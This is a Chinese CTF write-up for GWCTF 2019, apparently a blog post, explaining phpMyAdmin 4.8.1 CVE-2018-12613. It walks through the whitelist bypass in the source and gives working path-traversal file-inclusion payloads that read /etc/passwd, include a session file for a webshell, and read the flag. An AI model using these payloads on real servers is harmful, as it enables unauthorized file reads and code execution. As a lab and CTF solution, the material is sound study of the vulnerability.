[GWCTF 2019]我有一个数据库 wp

打开题目看到的是乱码,想到可能是还有其他的路径,就用dirsearch扫一下

得到了/phpmyadmin/路径,加上题目是我有一个数据库,于是想到应该本题就是和phpmyadmin数据库有关

我们可以看到phpmyadmin的版本为4.8.1,搜索后发现这个版本的phpmyadmin存在漏洞CVE-2018-12613,下面我们复现一下漏洞。

首先分析一下源码:

index.php 关于target的部分

$target_blacklist = array (
    'import.php', 'export.php'
);       设置黑名单,过滤'import.php', 'export.php'
&& is_string($_REQUEST['target'])   需要是字符串
&& ! preg_match('/^index/', $_REQUEST['target'])  不能以index开头
&& ! in_array($_REQUEST['target'], $target_blacklist)  黑名单
&& Core::checkPageValidity($_REQUEST['target']) 白名单过滤

Core::checkPageValidity方法位于libraries/classes/Core.php中443行,此函数作用为:

$whitelist 为空就引用申明的 $goto_whitelist;
$page 如果没有定义或者 $page 不为字符串就返回 false;
$page 如果存在在 $whitelist 中返回 true;
如果 $_page 存在在 $whitelist 中返回 true;
经过 urldecode 函数解码后的 $_page 存在在 $whitelist 中返回 true。

判断?前面的内容是否在白名单中,是则返回true。但是函数并没有对输入的参数做修改,截取的结果都保存在$_page中,所以target只需前面为白名单&%3F或者白名单%253F(?两次url编码)就可以绕过Core::checkPageValidity方法的白名单检测。

出现问题的代码:

$_page = urldecode($page);
$_page = mb_substr(
    $_page,
    0,
    mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
    return true;
}

在看看白名单

self::$goto_whitelist

所以可以在白名单?后面的参数进行操作

例如传入:
?target=db_sql.php%253f
由于服务器会自动解码一次,所以在checkPageValidity()中,$page的值一开始会是db_sql%3f,又一次url解码后变成了db_sql.php?,这次便符合了?前内容在白名单的要求,函数返回true
但在index.php中$_REQUEST['target']仍然是db_sql%3f,而且会被include,通过目录穿越,就可造成任意文件包含

漏洞复现

首先用 vulhub去复现漏洞    cd vulhub/phpmyadmin/CVE-2018-12613

利用docker-compose up -d 搭建环境

192.168.0.33:8080??target=db_sql.php%253f/../../../../../../../../etc/passwd

可见/etc/passwd被读取,说明文件包含漏洞存在

通过文件包含获取webshell

然后查看自己的sessionid(cookie中phpMyAdmin的值)

然后访问http://192.168.0.33:8080/?target=db_sql.php%253f/../../../../../../../../tmp/sess_9ddf5eb053ac119eb10c2838eb331f1b包含session文件即可

下面回到题目

可以用类似192.168.0.33:8080??target=db_sql.php%253f/../../../../../../../../etc/passwd的方法读取flag

payload:

phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../flag

 

 

 

 

评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值